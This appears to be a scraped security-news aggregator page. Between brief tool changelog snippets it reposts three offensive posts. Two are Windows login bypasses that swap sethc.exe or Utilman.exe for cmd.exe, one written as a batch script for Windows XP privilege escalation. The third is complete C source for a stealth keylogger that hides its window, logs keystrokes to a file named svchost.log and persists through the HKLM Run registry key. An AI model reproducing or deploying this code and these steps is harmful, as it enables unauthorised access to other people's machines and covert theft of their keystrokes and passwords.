Python Security is a free, open source, OWASP project that aims at creating a hardened version of python that makes it easier for security professionals…
Change v2.1.3 : Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS…
Microsoft Windows 7 / 8 / 8.1 Manual Auth Bypass.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101 0 ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄ 0 1 ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄ 1 0 ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███ 0 1 ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███ 1 0 ▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███ 0 1 ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ 1 0 ███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███ 0 1 ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀ 1 0 im Gh0sty member Of 1337Day Algeria 0 1--------------------------------------------------------------------------------------------0 0 Title : Microsoft Windows 7 / 8 / 8.1 Manual Auth Bypass 1 1 Discovrer : Ghosty (0x9h027) 0 0 Email : x31337666[at]gmail[dot]com 1 1 Facebook : https://facebook.com/0x9h027 (Subscribe Or PM me Only) 0 0 Home : Algeria 16023 ( Alger - Hydra ) 1 1 Category : Proof Of Concept 0 0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101 // Follow Steps Written Below 3:) 0x01 ~ Cracking Windows 7 Login ________________________________ ~ 1/ Make a Bootable ( DVD or USB Device ) Any Live OS like (MiniLinux - MiniXP - Ubunto ) And boot From It ~ 2/ Go To "C:\Windows\System32\" and backup These Files cmd.exe , sethc.exe ~ 3/ Now Delete sethc.exe ~ 4/ Now Rename cmd.exe to sethc.exe ~ 5/ Reboot To Your Windows In The Login Panel ~ 6/ CLICK in "Ease Of Access" BUTTON And Select[ High-Contrast // On-Screen-Keyboard // Sticky Keys] Then Ok You Will Get COMMAND :) ~ 7/ In CMD typeIn "mmc" ~ 8/ Congratulation Now In mmc You Can Change Your User Password :p 0x02 ~ Cracking Windows 8 Login _______________________________ ~ 1/ Make a Bootable ( DVD or USB Device ) Of Windows 8 Then Boot from it ~ 2/ In Setup Screen CLICK REPIAR COMPUTER Then Select TROUBLESHOOT >> ADVANCED OPTIONS >> COMMAND PROMPT ~ 3/ IN PROMPT EXECUTE : cd c:\Windows\System32\ ren Utilman.exe Utilman2.exe ren cmd.exe Utilman.exe ~ 4/ In Your Login Panel Click On "Ease Of Access" You Will Get COMMAND PROMPT 3:) ~ 5/ Congratulation You Can Execute : net user [USERNAME] and change your password :p ping~########################################################################################\ inject0rTEAM-ExploitiD-ExploitDB-an0nghost-an0nsec-an0nDZ-DZMAFIA-TEAM152 # Caddy-Tr0ooN-KedAnZ-KingOfPirates-backoverDZ-cc0de-foundZ-kha&m!x-El!teTr0jan # #############################################################################################/ #EOF |
Source : http://pastebin.com/eHQxCT2z
Windows XP Local Privilege Escalation Exploit.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101 0 ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄ 0 1 ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄ 1 0 ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███ 0 1 ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███ 1 0 ▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███ 0 1 ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ 1 0 ███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███ 0 1 ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀ 1 0 im Gh0sty member Of 1337Day Algeria 0 1--------------------------------------------------------------------------------------------0 0 Title : Windows XP Local Privilege Escalation Exploit 1 1 Discovrer : Ghosty (0x9h027) 0 0 Email : x31337666[at]gmail[dot]com 1 1 Facebook : https://facebook.com/0x9h027 (Subscribe Or PM me Only) 0 0 Home : Algeria 16023 ( Alger - Hydra ) 1 1 Category : Proof Of Concept 0 0 Tested : Windows XP SP1 , SP2 (FRENSH) 1 1010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010 // BATCH SCRIPT START HERE @echo off title Windows XP Local Privilege Escalation Exploit color 0a cls cd / && cd windows/system32/ mkdir ghosty && copy logon.scr ghosty\logon.scr && copy cmd.exe ghosty\cmd.exe del logon.scr && rename cmd.exe logon.scr echo. echo. echo Activate Screensaver and wait for it echo an Unprotected dos prompt will appear :: Gh0sty Grrr --- F-ck h4ck!n Luv 3xpl0!ting --- <3 <3 <3 :: short explaination :: so in this script we backup the cmd.exe(COMMAND PROMPT) & logon.src(SCREENSAVER) :: then we delete logon.scr and rename cmd.exe to logon.scr :: we set screensaver and wait for it the system (NT/AUTORITE) will look for screen saver file (logon.scr) but its cmd.exe :: so he will execute cmd.exe with higher privilege :) so we can use this to get the administrator account :: ex: net user [ADMIN_HERE] [PASS_HERE] //SCRIPT END ping~########################################################################################\ inject0rTEAM-ExploitiD-ExploitDB-an0nghost-an0nsec-an0nDZ-DZMAFIA-TEAM152 # Caddy-Tr0ooN-KedAnZ-KingOfPirates-backoverDZ-cc0de-foundZ-kha&m!x-El!teTr0jan # #############################################################################################/ #EOF |
Source : http://pastebin.com/SBXFFaY6
change log latest version ; + Add a request jinja var for server pages + Add a jinja function to create CSRF pages. + Add…
Simple Keylogger in C language [Stealth Mode ].
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 |
#include<windows.h> #include<stdio.h> #include<winuser.h> #include<windowsx.h> #define BUFSIZE 80 int test_key(void); int create_key(char *); int get_keys(void); int main(void){ HWND stealth; /*creating stealth (window is not visible)*/ AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); int test,create; test=test_key();/*check if key is available for opening*/ if (test==2){/*create key*/ char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/ create=create_key(path); } int t=get_keys(); return t; } int get_keys(void){ short character; while(1) { Sleep(10) ;/*to prevent 100% cpu usage*/ for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen("svchost.log","a+"); if(file==NULL) { return 1; } if(file!=NULL) { if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { switch(character) { case VK_SPACE: fputc(' ',file); fclose(file); break; case VK_SHIFT: fputs("[SHIFT]",file); fclose(file); break; case VK_RETURN: fputs("\n[ENTER]",file); fclose(file); break; case VK_BACK: fputs("[BACKSPACE]",file); fclose(file); break; case VK_TAB: fputs("[TAB]",file); fclose(file); break; case VK_CONTROL: fputs("[CTRL]",file); fclose(file); break; case VK_DELETE: fputs("[DEL]",file); fclose(file); break; case VK_OEM_1: fputs("[;:]",file); fclose(file); break; case VK_OEM_2: fputs("[/?]",file); fclose(file); break; case VK_OEM_3: fputs("[`~]",file); fclose(file); break; case VK_OEM_4: fputs("[ [{ ]",file); fclose(file); break; case VK_OEM_5: fputs("[\\|]",file); fclose(file); break; case VK_OEM_6: fputs("[ ]} ]",file); fclose(file); break; case VK_OEM_7: fputs("['\"]",file); fclose(file); break; case VK_NUMPAD0: fputc('0',file); fclose(file); break; case VK_NUMPAD1: fputc('1',file); fclose(file); break; case VK_NUMPAD2: fputc('2',file); fclose(file); break; case VK_NUMPAD3: fputc('3',file); fclose(file); break; case VK_NUMPAD4: fputc('4',file); fclose(file); break; case VK_NUMPAD5: fputc('5',file); fclose(file); break; case VK_NUMPAD6: fputc('6',file); fclose(file); break; case VK_NUMPAD7: fputc('7',file); fclose(file); break; case VK_NUMPAD8: fputc('8',file); fclose(file); break; case VK_NUMPAD9: fputc('9',file); fclose(file); break; case VK_CAPITAL: fputs("[CAPS LOCK]",file); fclose(file); break; default: fclose(file); break; } } } } } } return EXIT_SUCCESS; } int test_key(void) { int check; HKEY hKey; char path[BUFSIZE]; DWORD buf_length=BUFSIZE; int reg_key; reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey); if(reg_key!=0) { check=1; return check; } reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length); if((reg_key!=0)||(buf_length>BUFSIZE)) check=2; if(reg_key==0) check=0; RegCloseKey(hKey); return check; } int create_key(char *path) { int reg_key,check; HKEY hkey; reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey); if(reg_key==0) { RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path)); check=0; return check; } if(reg_key!=0) check=1; return check; } |
Changelog Yara v3.2.0 : + ELF module + Hash module + New features in PE module + Big-endian version of intXX and uintXX functions +…
changelog v-1.6.4 : New: – Boot loader detection for AIX [BOOT-5102] – Detection of getcap and lsvg binary – Added filesystem_ext to report – Detect…